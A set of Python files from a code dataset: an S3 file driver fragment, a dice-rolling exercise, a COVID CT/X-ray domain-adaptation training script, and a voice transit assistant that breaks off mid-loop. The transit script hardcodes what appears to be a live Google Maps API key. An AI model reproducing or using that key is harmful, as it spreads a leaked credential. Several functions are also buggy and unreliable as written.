remote_md5)\n\n logging.info('Uploaded: %s' % self.s3_url(self.bucket_name, remote_path))\n\n def download(self, remote_path, local_path, md5):\n \"\"\"\n Download file from S3 bucket.\n\n :param remote_path: S3 path to download\n :param local_path: local destination path\n :param md5: MD5 digest hex string to verify\n :return: None\n \"\"\"\n k = self.bucket().get_key(remote_path)\n if not k:\n raise ValueError('File not found: %s' % self.s3_url(self.bucket(), remote_path))\n remote_md5 = k.etag.strip('\"')\n assert md5 is None or md5 == remote_md5, \\\n 'Failed to check MD5 digest: local=%s, remote=%s' % (md5, remote_md5)\n\n with ProgressBar():\n k.get_contents_to_filename(local_path)\n\n logging.info('Downloaded: %s' % local_path)\n\n def delete(self, remote_path, md5):\n \"\"\"\n Delete file from S3 bucket.\n\n :param remote_path: S3 path to delete\n :param md5: MD5 digest hex string to verify\n :return: None\n \"\"\"\n k = self.bucket().get_key(remote_path)\n if not k:\n raise ValueError('File not found: %s' % self.s3_url(self.bucket(), remote_path))\n remote_md5 = k.etag.strip('\"')\n assert md5 is None or md5 == remote_md5, \\\n 'Failed to check MD5 digest: local=%s, remote=%s' % (md5, remote_md5)\n\n k.delete()\n logging.info('Deleted: %s' % remote_path)\n\n @classmethod\n def s3_url(cls, bucket_name, key):\n return 's3://%s/%s' % (bucket_name, key)\n","sub_path":"src/artifactcli/driver/s3driver.py","file_name":"s3driver.py","file_ext":"py","file_size_in_byte":5182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"585323423","text":"from random import randint\nfrom collections import OrderedDict\n#9-13\n\n\"\"\"#6-4\npython = {'lists': 'Allows you to store info in one place', 'if_statements':\n 'Allows you to examine current state of a program and respond appropriately'\n ,'dictionaires': 'Allows you to connect pieces of related information'\n }\nfor code,meaning in python.items():\n print(\"\\n\" + code + \":\" + meaning)\"\"\"\n \npython = OrderedDict()\n\npython['lists'] = 'Allows you to store info in one place'\npython['if_statements'] = 'Allows you to examine current state of a program \\\nand respond appropriately'\npython['dictionaires'] = 'Allows you to connect pieces of related information'\n\n#for functions,definitions in python.items():\n # print(functions + ': ' + definitions)\n\n#9-11\nclass Die():\n \"\"\"A six sided die\"\"\"\n def __init__(self):\n self.sides = 6\n \n def roll_die(self):\n \"\"\"Rolls die 10 times and prints number on die each time.\"\"\"\n count = 0\n while count < 11:\n num = randint(1,self.sides)\n print(str(num))\n count += 1\n \n def set_sides(self,num_sides):\n \"\"\"User can change number of sides on die.\"\"\"\n self.sides = num_sides\n \ndie = Die()\n\ndie.roll_die()\nprint(\"\\n\")\ndie.sides = 20\ndie.roll_die()\n","sub_path":"random_methods.py","file_name":"random_methods.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"446040052","text":"\nimport pytorch_lightning as pl\nfrom torch.optim import Adam\nfrom pytorch_lightning import Trainer\nfrom argparse import ArgumentParser\nimport torch\nimport torchvision.transforms as transforms\nimport torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.optim.lr_scheduler import StepLR,CosineAnnealingLR\nimport torchvision.models as models\nimport json\nfrom pytorch_lightning.callbacks import EarlyStopping, ModelCheckpoint, LearningRateLogger\nfrom sklearn.metrics import confusion_matrix,f1_score\nimport os\nos.chdir(os.path.dirname(__file__)) # set current .py file as working directory\nimport sys\n\nsys.path.insert(0,\"../..\")\n# customized packages\nfrom src.lib.dataset import *\nfrom src.lib.helper_func import *\n\n#CAN\nfrom src.model import model\nfrom src.config.config import cfg, cfg_from_file, cfg_from_list\nfrom src.discrepancy.cdd import CDD\nimport random\nfrom src.utils.utils import to_cuda, to_onehot\n\n\nclass Mixed_COVID_CT_Xray_Sys(pl.LightningModule):\n\n def __init__(self, hparams):\n super().__init__()\n\n # do this to save all arguments in any logger (tensorboard)\n self.hparams = hparams\n\n with open(hparams.dataset_info) as fp:\n self.dataset_info_table = json.load(fp)\n self.dataset_info = self.dataset_info_table[hparams.dataset_name]\n\n # split train and val\n # self.data_split,self.dataset_label = self.split_train_val()\n\n # CAN\n # initialize model\n model_state_dict = None\n fx_pretrained = True\n resume_dict = None\n\n\n\n num_domains_bn = 2\n net = model.danet(num_classes=self.hparams.num_class,\n state_dict=model_state_dict,\n feature_extractor=cfg.MODEL.FEATURE_EXTRACTOR,\n frozen=[cfg.TRAIN.STOP_GRAD],\n fx_pretrained=fx_pretrained,\n dropout_ratio=cfg.TRAIN.DROPOUT_RATIO,\n fc_hidden_dims=cfg.MODEL.FC_HIDDEN_DIMS,\n num_domains_bn=num_domains_bn)\n\n self.model = net\n # num_ftrs = self.model.classifier.in_features\n # self.model.classifier = nn.Linear(num_ftrs, hparams.num_class)\n # self.init_weights(self.model.classifier)\n self.opt = cfg\n\n self.discrepancy_key = 'intra' if self.opt.CDD.INTRA_ONLY else 'cdd'\n num_layers = len(self.model.FC) + 1\n print(\"Num_layers: \", num_layers)\n self.cdd = CDD(kernel_num=self.opt.CDD.KERNEL_NUM, kernel_mul=self.opt.CDD.KERNEL_MUL,\n num_layers=num_layers, num_classes=self.hparams.num_class,\n intra_only=self.opt.CDD.INTRA_ONLY)\n\n # transforms\n self.train_transformer = transforms.Compose([\n transforms.Resize(256),\n transforms.RandomResizedCrop((224), scale=(0.5, 1.0)),\n # transforms.Resize((224, 224)),\n transforms.RandomHorizontalFlip(),\n # transforms.RandomRotation(90),\n transforms.RandomAffine(degrees=15, translate=(0.1, 0.1), shear=(-5, 5, -5, 5)),\n # random brightness and random contrast\n transforms.ColorJitter(brightness=0.2, contrast=0.2),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.45271412, 0.45271412, 0.45271412],\n std=[0.33165374, 0.33165374, 0.33165374])\n ])\n\n self.all_x = self.classAwareLoad()\n\n # self.model = models.densenet169(pretrained=True)\n # num_ftrs = self.model.classifier.in_features\n # self.model.classifier = nn.Linear(num_ftrs, hparams.num_class)\n # self.init_weights(self.model.classifier)\n # self.model.load_state_dict(torch.load(hparams.pretrained_path))\n\n # def split_train_val(self):\n # import sklearn.model_selection\n #\n #\n # CTnoncovid_img_list = [os.path.join(self.dataset_info[\"CTnoncovid\"], p) for p in\n # os.listdir(self.dataset_info[\"CTnoncovid\"])]\n # CTcovid_img_list = [os.path.join(self.dataset_info[\"CTcovid\"], p) for p in\n # os.listdir(self.dataset_info[\"CTcovid\"])]\n # CTlabel = [0] * len(CTnoncovid_img_list) + [1] * len(CTcovid_img_list)\n # CTsplit = sklearn.model_selection.train_test_split(CTnoncovid_img_list + CTcovid_img_list , CTlabel,\n # test_size=0.3, random_state=66)\n #\n # Xraynoncovid_img_list = [os.path.join(self.dataset_info[\"Xraynoncovid\"], p) for p in\n # os.listdir(self.dataset_info[\"Xraynoncovid\"])]\n # Xraycovid_img_list = [os.path.join(self.dataset_info[\"Xraycovid\"], p) for p in\n # os.listdir(self.dataset_info[\"Xraycovid\"])]\n # Xraylabel = [0] * len(Xraynoncovid_img_list) + [1] * len(Xraycovid_img_list)\n # Xraysplit = sklearn.model_selection.train_test_split(Xraynoncovid_img_list + Xraycovid_img_list, Xraylabel,\n # test_size=0.3, random_state=66)\n # # \"0\":CT dataset; \"1\":Xray dataset\n # ds_train_label = [0] * len(CTsplit[0]) + [1] * len(Xraysplit[0])\n # ds_val_label = [0] * len(CTsplit[1]) + [1] * len(Xraysplit[1])\n # dataset_label = {\"train\":ds_train_label,\"val\":ds_val_label }\n # data_split = []\n # for ct,xray in zip(CTsplit,Xraysplit):\n # data_split.append(ct+xray)\n #\n # return data_split,dataset_label\n\n def init_weights(self, m):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.Linear):\n nn.init.constant_(m.bias, 0)\n\n def train_dataloader(self):\n # data\n trainset = MixedDataset(self.dataset_info,train=True, transform=self.train_transformer)\n dataloader = DataLoader(trainset, batch_size=self.hparams.batch_size, drop_last=False, shuffle=True,\n num_workers=6)\n return dataloader\n\n def val_dataloader(self):\n # print(\"Val_loader\")\n val_transformer = transforms.Compose([\n transforms.Resize((224, 224)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.45271412, 0.45271412, 0.45271412],\n std=[0.33165374, 0.33165374, 0.33165374])\n ])\n valset = MixedDataset(self.dataset_info, train=False, transform=val_transformer)\n return DataLoader(valset, batch_size=self.hparams.batch_size, drop_last=False, shuffle=False, num_workers=6)\n\n def forward(self, x):\n x = self.model(x)\n return x\n\n def configure_optimizers(self):\n optimizer = Adam(self.parameters(), lr=self.hparams.learning_rate)\n scheduler = StepLR(optimizer, step_size=9999999999999)\n # scheduler = CosineAnnealingLR(optimizer, self.trainer.max_epochs, self.hparams.cos_lr_min)\n return {\"optimizer\": optimizer, \"lr_scheduler\": scheduler}\n\n def prepare_feats(self, feats):\n return [feats[key] for key in feats if key in self.opt.CDD.ALIGNMENT_FEAT_KEYS]\n\n def CAS(self):\n sample_num = int(self.hparams.batch_size/2)\n source_samples_0 = random.sample(self.all_x['source_x']['class0'], sample_num)\n source_samples_1 = random.sample(self.all_x['source_x']['class1'], sample_num)\n target_samples_0 = random.sample(self.all_x['target_x']['class0'], sample_num)\n target_samples_1 = random.sample(self.all_x['target_x']['class1'], sample_num)\n source_samples = source_samples_0 + source_samples_1\n target_samples = target_samples_0 + target_samples_1\n\n source_nums = [sample_num, sample_num]\n target_nums = [sample_num, sample_num]\n\n return source_samples, source_nums, target_samples, target_nums\n\n\n def CAS_byWeight(self):\n sum = len(self.all_x['source_x']['class0']) + len(self.all_x['source_x']['class1']) \\\n + len(self.all_x['target_x']['class0']) + len(self.all_x['target_x']['class1'])\n total_num = 2*self.hparams.batch_size\n source_num_0 = int(total_num * len(self.all_x['source_x']['class0'])/sum)\n source_num_1 = int(total_num * len(self.all_x['source_x']['class1'])/sum)\n target_num_0 = int(total_num * len(self.all_x['target_x']['class0'])/sum)\n target_num_1 = int(total_num * len(self.all_x['target_x']['class1'])/sum)\n\n source_samples_0 = random.sample(self.all_x['source_x']['class0'], source_num_0)\n source_samples_1 = random.sample(self.all_x['source_x']['class1'], source_num_1)\n target_samples_0 = random.sample(self.all_x['target_x']['class0'], target_num_0)\n target_samples_1 = random.sample(self.all_x['target_x']['class1'], target_num_1)\n source_samples = source_samples_0 + source_samples_1\n target_samples = target_samples_0 + target_samples_1\n\n source_nums = [source_num_0, source_num_1]\n target_nums = [target_num_0, target_num_1]\n\n return source_samples, source_nums, target_samples, target_nums\n\n\n def training_step(self, batch, batch_idx):\n # conventional\n data, label, ds_label = batch\n output = self(data)['logits']\n criterion = nn.CrossEntropyLoss()\n ce_loss = criterion(output, label.long())\n\n # cdd\n # 1) class-aware sampling\n if self.hparams.weighted_CAS:\n source_samples_cls, source_nums_cls, \\\n target_samples_cls, target_nums_cls = self.CAS_weighted()\n else:\n source_samples_cls, source_nums_cls, \\\n target_samples_cls, target_nums_cls = self.CAS()\n\n\n # 2) forward and compute the loss\n source_cls_concat = torch.cat([to_cuda(samples)\n for samples in source_samples_cls], dim=0)\n target_cls_concat = torch.cat([to_cuda(samples)\n for samples in target_samples_cls], dim=0)\n\n feats_source = self.model(source_cls_concat)\n feats_target = self.model(target_cls_concat)\n\n # prepare the features\n feats_toalign_S = self.prepare_feats(feats_source)\n feats_toalign_T = self.prepare_feats(feats_target)\n\n cdd_loss = self.cdd.forward(feats_toalign_S, feats_toalign_T,\n source_nums_cls, target_nums_cls)[self.discrepancy_key]\n\n cdd_loss *= self.opt.CDD.LOSS_WEIGHT\n loss = ce_loss + cdd_loss\n # add logging\n logs = {'loss': loss, 'ce_loss': ce_loss, 'cdd_loss': cdd_loss}\n return {'loss': loss, 'ce_loss': ce_loss, 'cdd_loss': cdd_loss, 'log': logs}\n\n def validation_step(self, batch, batch_idx):\n print(\"validation_step\")\n x, y, ds_label = batch\n logits = self(x)[\"logits\"]\n criterion = nn.CrossEntropyLoss()\n loss = criterion(logits, y)\n # compute confucsion matrix on this batch\n pred = logits.argmax(dim=1).view_as(y)\n return {'val_loss': loss, \"pred\": pred, \"label\": y, \"ds_label\":ds_label}\n\n def validation_epoch_end(self, outputs):\n avg_loss = torch.stack([x['val_loss'] for x in outputs]).mean()\n pred_total = torch.cat([x['pred'] for x in outputs]).view(-1)\n y_total = torch.cat([x['label'] for x in outputs]).view(-1)\n ds_label = torch.cat([x['ds_label'] for x in outputs]).view(-1)\n\n val_acc = torch.mean((pred_total.cpu() == y_total.cpu()).type(torch.float))\n F1_score = torch.tensor(f1_score(y_total.cpu(),pred_total.cpu(),average=\"micro\"))\n\n ct_ind = torch.where(ds_label==0)\n CT_F1_score = torch.tensor(f1_score(y_total[ct_ind].cpu(),pred_total[ct_ind].cpu(),average=\"micro\"))\n ct_Confusion_matrix = confusion_matrix(y_total[ct_ind].cpu(), pred_total[ct_ind].cpu())\n\n xray_ind = torch.where(ds_label==1)\n Xray_F1_score = torch.tensor(f1_score(y_total[xray_ind].cpu(),pred_total[xray_ind].cpu(),average=\"micro\"))\n xray_Confusion_matrix = confusion_matrix(y_total[xray_ind].cpu(), pred_total[xray_ind].cpu())\n\n\n print(\"val_loss = \", avg_loss.cpu())\n print(\"CT_F1_score=\",CT_F1_score)\n print(\"Xray_F1_score = \",Xray_F1_score)\n print(\"ct_Confusion_matrix = \\n\",ct_Confusion_matrix)\n print(\"xray_Confusion_matrix = \\n\",xray_Confusion_matrix)\n logs = {\"F1_score\":F1_score,\"val_acc\": val_acc,\"val_loss\":avg_loss,\n \"CT_F1_score\":CT_F1_score, \"Xray_F1_score\":Xray_F1_score}\n return {'log': logs}\n\n def test_step(self, batch, batch_idx):\n x, y = batch\n logits = self(x)\n criterion = nn.CrossEntropyLoss()\n loss = criterion(logits, y)\n # compute confucsion matrix on this batch\n pred = logits.argmax(dim=1).view_as(y)\n return {'test_loss': loss, \"pred\": pred, \"label\": y}\n\n def test_epoch_end(self, outputs):\n avg_loss = torch.stack([x['test_loss'] for x in outputs]).mean()\n\n pred_total = torch.cat([x['pred'] for x in outputs]).view(-1)\n y_total = torch.cat([x['label'] for x in outputs]).view(-1)\n F1_score = f1_score(y_total.cpu(), pred_total.cpu(), average=\"binary\")\n tensorboard_logs = {'test_loss': avg_loss, \"F1_score\": F1_score}\n return {'test_loss': avg_loss, 'log': tensorboard_logs}\n\n def on_epoch_start(self):\n if self.hparams.freeze_epochs > 0:\n if self.current_epoch == self.hparams.freeze_epochs:\n self.unfreeze_for_transfer()\n\n def on_epoch_end(self):\n if self.hparams.log_histogram:\n self.log_histogram()\n\n def on_train_start(self):\n if self.hparams.freeze_epochs > 0:\n self.freeze_for_transfer()\n\n \"\"\"=============================self-defined function=============================\"\"\"\n\n def log_histogram(self):\n print(\"\\nlog hist of weights\")\n\n enc_dict = self.model.feature_extractor.state_dict()\n for name, val in enc_dict.items():\n self.logger.experiment.add_histogram(\"features/\" + name, val, self.current_epoch)\n\n cls_dict = self.model.classifier.state_dict()\n for name, val in cls_dict.items():\n self.logger.experiment.add_histogram(\"classifier/\" + name, val, self.current_epoch)\n\n def freeze_for_transfer(self):\n print(\"Freeze encoder for {} epochs\".format(self.hparams.freeze_epochs))\n for param in self.model.feature_extractor.parameters():\n param.requires_grad = False\n\n def unfreeze_for_transfer(self):\n print(\"\\n UnFreeze encoder at {}-th epoch\".format(self.hparams.freeze_epochs))\n for param in self.model.feature_extractor.parameters():\n param.requires_grad = True\n\n @staticmethod\n def add_model_specific_args(parent_parser):\n parser = ArgumentParser(parents=[parent_parser], add_help=False)\n\n return parser\n\n\n def classAwareLoad(self):\n xray = self.dataset_info_table[self.hparams.dataset_xray]\n ct = self.dataset_info_table[self.hparams.dataset_ct]\n # xray dataloader\n trainset_xray = CovidXray2clsDataset(xray, train=True, transform=self.train_transformer)\n dataloader_xray = DataLoader(trainset_xray, drop_last=False, shuffle=True,\n num_workers=4)\n\n # CT dataloader\n trainset_ct = CovidCTDataset(root_dir=ct[\"image_folder\"],\n txt_COVID=ct[\"data_split\"] + '/COVID/trainCT_COVID.txt',\n txt_NonCOVID=ct[\"data_split\"] + '/NonCOVID/trainCT_NonCOVID.txt',\n transform=self.train_transformer)\n dataloader_ct = DataLoader(trainset_ct, drop_last=False, shuffle=True,\n num_workers=4)\n\n source_x_class0 = []\n source_x_class1 = []\n target_x_class0 = []\n target_x_class1 = []\n for x, y in dataloader_xray:\n if y == 0:\n source_x_class0.append(x)\n else:\n source_x_class1.append(x)\n\n for x, y in dataloader_ct:\n if y == 0:\n target_x_class0.append(x)\n else:\n target_x_class1.append(x)\n\n source_x = {'class0': source_x_class0, 'class1': source_x_class1}\n target_x = {'class0': target_x_class0, 'class1': target_x_class1}\n return {'source_x': source_x, 'target_x': target_x}\n\n\ndef main(args):\n # pick model according to args\n if args.early_stop_callback:\n early_stop_callback = EarlyStopping(\n monitor='val_loss',\n patience=30,\n strict=True,\n verbose=False,\n mode='min'\n )\n else:\n early_stop_callback = False\n\n checkpoint_callback = ModelCheckpoint(\n filepath=None,\n monitor='F1_score',\n save_top_k=1,\n mode='max'\n )\n\n lr_logger = LearningRateLogger()\n\n if args.test:\n pretrained_model = Mixed_COVID_CT_Xray_Sys.load_from_checkpoint(args.model_path)\n trainer = Trainer(gpus=args.gpus)\n trainer.test(pretrained_model)\n return 0\n # pretrained_model.freeze()\n # y_hat = pretrained_model(x)\n\n Sys = Mixed_COVID_CT_Xray_Sys(hparams=args)\n trainer = Trainer(early_stop_callback=early_stop_callback,\n checkpoint_callback=checkpoint_callback,\n callbacks=[lr_logger],\n gpus=args.gpus,\n default_root_dir = '../../results/logs/{}'.format(os.path.basename(__file__)[:-3]),\n max_epochs=args.max_epochs)\n\n trainer.fit(Sys)\n\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n # parser = Trainer.add_argparse_args(parser)\n\n # figure out which model to use\n parser.add_argument('--dataset_name', type=str, default='Mixed_COVID_CT_Xray', help='')\n parser.add_argument('--dataset_xray', type=str, default='COVID-Xray2cls', help='')\n parser.add_argument('--dataset_ct', type=str, default='COVID-CT', help='')\n parser.add_argument('--dataset_info', type=str, default='dataset_info.json', help='path to datainfo .json file')\n # parser.add_argument('--pretrained_path', type=str, default='DenseNet169/Self-Trans/Self-Trans.pt', help='path to pretrained model')\n\n parser.add_argument('--early_stop_callback', type=bool, default=False, help='')\n parser.add_argument('--gpus', type=int, default=1, help='')\n parser.add_argument('--test', type=bool, default=False, help='')\n parser.add_argument('--model_path', type=str, default=\"\", help='the well-trained model path for testing')\n parser.add_argument('--freeze_epochs', type=int, default=30)\n parser.add_argument('--batch_size', type=int, default=16)\n parser.add_argument('--learning_rate', type=float, default=0.0005)\n parser.add_argument('--cos_lr_min', type=float, default=5e-7)\n parser.add_argument('--max_epochs', type=int, default=300)\n parser.add_argument('--loss_w1', type=float, default=0.45,\n help='CrossEntropy loss weight for COVID type (Majority)')\n parser.add_argument('--num_class', type=int, default=2)\n parser.add_argument('--weighted_CAS', type=bool, default=False, help='')\n # Debug Info\n parser.add_argument('--log_histogram', type=bool, default=False, help='')\n parser.add_argument('--note', type=str, default=\"\", help='')\n # THIS LINE IS KEY TO PULL THE MODEL NAME\n temp_args = parser.parse_known_args()\n\n # let the model add what it wants\n\n parser = Mixed_COVID_CT_Xray_Sys.add_model_specific_args(parser)\n\n args = parser.parse_args()\n\n # train\n main(args)\n","sub_path":"src/scripts/CAN_COVID_CT_Xray_train.py","file_name":"CAN_COVID_CT_Xray_train.py","file_ext":"py","file_size_in_byte":19883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"129028081","text":"import random\nimport time\nimport speech_recognition as sr\nimport urllib.request, json\nimport re\nimport datetime\nimport urllib.request\nimport json\nPROMPT_LIMIT = 3\n\n\ndef speech_from_txt(s):\n # [START tts_quickstart]\n \"\"\"Synthesizes speech from the input string of text or ssml.\n Note: ssml must be well-formed according to:\n https://www.w3.org/TR/speech-synthesis/\n \"\"\"\n from gtts import gTTS\n tts = gTTS(s)\n tts.save(\"va.mp3\")\n\n try:\n \n from playsound import playsound\n playsound('va.mp3')\n\n except:\n pass\n \"\"\"from pygame import mixer\n #__init__()\n music.load(\"va.mp3\")\n music.play() \"\"\" \n \n\ndef recognize_speech_from_mic(recognizer, microphone):\n \"\"\"Transcribe speech from recorded from `microphone`.\n\n Returns a dictionary with three keys:\n \"success\": a boolean indicating whether or not the API request was\n successful\n \"error\": `None` if no error occured, otherwise a string containing\n an error message if the API could not be reached or\n speech was unrecognizable\n \"transcription\": `None` if speech could not be transcribed,\n otherwise a string containing the transcribed text\n \"\"\"\n # check that recognizer and microphone arguments are appropriate type\n if not isinstance(recognizer, sr.Recognizer):\n raise TypeError(\"`recognizer` must be `Recognizer` instance\")\n\n if not isinstance(microphone, sr.Microphone):\n raise TypeError(\"`microphone` must be `Microphone` instance\")\n\n # adjust the recognizer sensitivity to ambient noise and record audio\n # from the microphone\n with microphone as source:\n recognizer.adjust_for_ambient_noise(source)\n audio = recognizer.listen(source)\n\n # set up the response object\n response = {\n \"success\": True,\n \"error\": None,\n \"transcription\": None\n }\n\n # try recognizing the speech in the recording\n # if a RequestError or UnknownValueError exception is caught,\n # update the response object accordingly\n try:\n response[\"transcription\"] = recognizer.recognize_google(audio)\n except sr.RequestError:\n # API was unreachable or unresponsive\n response[\"success\"] = False\n response[\"error\"] = \"API unavailable\"\n except sr.UnknownValueError:\n # speech was unintelligible\n response[\"error\"] = \"Unable to recognize speech\"\n\n return response\n\ndef prompt_user():\n # set the list of words, maxnumber of guesses, and prompt limit\n #WORDS = [\"apple\", \"banana\", \"grape\", \"orange\", \"mango\", \"lemon\"]\n #NUM_GUESSES = 3\n PROMPT_LIMIT = 3\n\n # create recognizer and mic instances\n recognizer = sr.Recognizer()\n microphone = sr.Microphone()\n\n # get a random word from the list\n #word = random.choice(WORDS)\n\n # format the instructions string\n instructions = (\n \"Speak when asked to.\\n\"\n )\n\n\n #speech_from_txt(\"Speak when asked to\")\n \n # show instructions and wait 3 seconds before starting the game\n print(instructions)\n time.sleep(1)\n for j in range(PROMPT_LIMIT):\n time.sleep(1)\n print('Speak!\\n')\n text = recognize_speech_from_mic(recognizer, microphone)\n if not text[\"success\"]:\n print(\"error with API call\")\n break\n if text[\"transcription\"]:\n print(\"You said: {}.Is this correct?\\n\".format(text[\"transcription\"]))\n time.sleep(0.2)\n for k in range(PROMPT_LIMIT):\n #print(\"Speak again\\n\")\n text_2=recognize_speech_from_mic(recognizer, microphone)\n if text_2[\"transcription\"]==\"yes\":\n print(\"Understood\\n\")\n time.sleep(2)\n return text[\"transcription\"].lower()\n if text_2[\"transcription\"]==\"no\":\n print(\"Sorry about that, could you please repeat that for me\\n\")\n time.sleep(0.3)\n break\n else:\n print(\"I didn't catch your answer. What did you say?\\n\")\n time.sleep(0.3)\n break\n\n # if there was an error, stop the game\n if text[\"error\"]:\n print(\"ERROR: {}\".format(text[\"error\"]))\n \n \ndef google_api1(destination):\n print(\"CHECKING IF DESTINATION IS VALID\")\n time.sleep(5)\n endpoint='https://maps.googleapis.com/maps/api/directions/json?'\n api_key='AIzaSyCQAs4T3bVLI2RRJQN3bwsj4ZkSiQHMQUs'\n origin='Yonge+and+Finch+Toronto+Ontario'\n destination=destination.replace(\" \",'+')\n mode='transit'\n transit_mode='bus'\n #transit_routing_preference=['less_walking','fewer_transfers']\n #preference_input=input('To select a route that invloves less walking press or say 1, for a route that involves fewer bus transfers, press or say 2: ')\n #if (preference_input=='1'):\n navigation_req='origin={}&destination={}&mode={}&transit_mode={}&key={}'.format(origin, destination,mode,transit_mode,api_key)\n #else:\n #navigation_req='origin={}&destination={}&mode={}&transit_mode={}&transit_routing_preference={}&key={}'.format(origin, destination,mode,transit_mode,transit_routing_preference[1],api_key)\n google_request=endpoint + navigation_req\n response=urllib.request.urlopen(google_request).read()\n directions=json.loads(response) \n routes=directions['routes']\n #print(routes)\n if (routes==[]):\n #return False\n routes_available= False\n print(\"NO AVAILABLE ROUTES FOUND. DESTINATION DOES NOT EXIST\")\n time.sleep(2)\n #print(\"We couldn't find routes to the destination specified or the destination entered was invalid\")\n else:\n #return True\n print(\"DESTINATION FOUND\")\n time.sleep(2)\n routes_available= True\n return routes_available\n\ndef google_api2(destination,preference_input):\n print(\"CALCULATING DIRECTIONS TO THE CHOSEN DESTINATION\\n\")\n time.sleep(5)\n endpoint='https://maps.googleapis.com/maps/api/directions/json?'\n api_key='AIzaSyCQAs4T3bVLI2RRJQN3bwsj4ZkSiQHMQUs'\n origin='Yonge+and+Finch+Toronto+Ontario'\n destination=destination.replace(\" \",'+')\n mode='transit'\n transit_mode='bus'\n #transit_routing_preference=['less_walking','fewer_transfers']\n \n #preference_input=input('To select a route that invloves less walking press or say 1, for a route that involves fewer bus transfers, press or say 2: ')\n navigation_req='origin={}&destination={}&mode={}&transit_mode={}&transit_routing_preference={}&key={}'.format(origin, destination,mode,transit_mode,preference_input,api_key)\n \n \n google_request=endpoint + navigation_req \n response=urllib.request.urlopen(google_request).read()\n directions=json.loads(response)\n \n routes=directions['routes']\n route_available= google_api1(destination)\n if route_available==True:\n trip_details={}\n possible_routes=routes[0]['legs']\n distance1=possible_routes[0]['steps'][1]['distance']['text']\n bus_num=possible_routes[0]['steps'][1]['transit_details']['line']['short_name']\n departure_stop1=possible_routes[0]['steps'][1]['transit_details']['departure_stop']['name']\n departure_time1=possible_routes[0]['steps'][1]['transit_details']['departure_time']['text']\n arrival_stop1=possible_routes[0]['steps'][1]['transit_details']['arrival_stop']['name']\n arrival_time1=possible_routes[0]['steps'][1]['transit_details']['arrival_time']['text']\n trip_details={'bus_num':bus_num,'Distance':distance1,\n 'Departure_stop':departure_stop1,\n 'Departure_time':departure_time1,\n 'arrival_stop':arrival_stop1,'arrival_time':arrival_time1}\n print(\"ITENERARY AQUIRED\")\n time.sleep(3)\n return trip_details\n\ndef get_time(raw_time):\n print(\"CALCULATING REMAINING TIME LEFT TILL BUS ARRIVAL\")\n time.sleep(3)\n current = datetime.datetime.now()\n hour_now = current.hour\n minute_now = current.minute\n\n bus_hour = int(raw_time[:-4])\n if raw_time[-1] == 'p':\n bus_hour += 12 \n \n\n bus_min = int(raw_time[-3:-1])\n\n bus_min_t = bus_min + 60*bus_hour\n min_t = minute_now + 60*hour_now\n\n print(bus_min_t)\n print(min_t)\n minutes = bus_min_t - min_t\n\n h = (60%minutes)\n m = (minutes - 60*h)\n\n print(h)\n print(m)\n\n \n m=str(m)\n h=str(h)\n print(\"TIME CALCULATED\")\n \n time.sleep(2)\n return [h,m]\n\ndef get_raw_schedule():\n endpoint = 'https://myttc.ca/finch_station.json'\n response = urllib.request.urlopen(endpoint).read()\n raw_schedule = json.loads(response)\n print(\"GETTING RAW SCHEDULE\")\n time.sleep(2)\n return raw_schedule\n\ndef create_schedule(raw_schedule):\n bus_timing = {}\n ls = raw_schedule['stops'][1]['routes']\n print(\"BUILDING SCHEDULE\")\n time.sleep(2)\n for row in ls:\n for col in row[\"stop_times\"]:\n bus_name = col[\"shape\"]\n if bus_name in bus_timing.keys():\n break\n else:\n bus_timing[bus_name] = col[\"departure_time\"]\n #print(\"bus: {} is departing at {}\".format(bus_name,bus_timing[bus_name]))\n print(\"BUS SCHEDULE GENERATED\")\n time.sleep(2)\n return bus_timing\n\ndef get_certain_bus_time(bus_num,schedule):\n print(\"CHECKING TIMING FOR BUS\")\n time.sleep(2)\n for key in schedule.keys():\n if bus_num in key:\n print(\"BUS FOUND\")\n time.sleep(2)\n raw_time = schedule[key]\n return raw_time\n print(\"SEARCHING\")\n time.sleep(1)\n print(\"BUS NOT FOUND\")\n time.sleep(3)\n return \"DNE\"\n\nif __name__ == \"__main__\":\n EXIT=\"exit\"\n while(1):\n print(\"BEGINNING OF THE WHILE LOOP\")\n time.sleep(2)\n print(\"Hello. Say option one to find the next arrival of a bus, option 2 to find transit directions to a place, or exit to start over\")\n time.sleep(4)\n for a in range(PROMPT_LIMIT):\n command=prompt_user()\n if command==\"option 1\":\n print(\"Great. Which bus would you like to find?\\n\")\n for b in range(PROMPT_LIMIT):\n command=prompt_user()\n if command==EXIT:\n print(\"Exiting\")\n time.sleep(1)\n break\n else:\n bus_num=command\n print(\"Great!\")\n time.sleep(1)\n print(\"CHECKING IF BUS EXISTS\")\n time.sleep(4)\n raw_schedule=get_raw_schedule()\n schedule=create_schedule(raw_schedule)\n bus_num = bus_num.upper()\n print(\"busNUM {}\".format(bus_num))\n bus_time=get_certain_bus_time(bus_num,schedule)\n if bus_time!=\"DNE\":\n print(\"GETTING ETA\")\n time.sleep(3)\n l = get_time(bus_time)\n hours=l[0]\n minutes=l[1]\n if hours!=0:\n message=bus_num+\" will arrive in \"+hours+\" hours and \"+minutes+\" minutes\"\n else:\n message=bus_num+\" will arrive in \"+minutes+\" minutes\"\n print(message)\n time.sleep(7)\n break\n else:\n print(\"I'm sorry, I couldnt find when that bus will arrive. Please state a bus that arrives at this bus station or say exit to start over\")\n time.sleep(5)\n if command==\"option 2\":\n print(\"Great. Please state your destination address or say exit to start over\")\n for c in range(PROMPT_LIMIT):\n command=prompt_user()\n if command!=EXIT:\n destination=command\n destination_exists=google_api1(destination)\n if destination_exists==True:\n print(\"Great. Would you prefer a route with fewer transfers or less walking?\")\n time.sleep(3)\n for d in range(PROMPT_LIMIT):\n command=prompt_user()\n if command==\"fewer transfers\":\n option=\"fewer_transfers\"\n itinerary=google_api2(destination,option)\n arrival_stop=itinerary[\"arrival_stop\"]\n departure_time=itinerary['Departure_time']\n 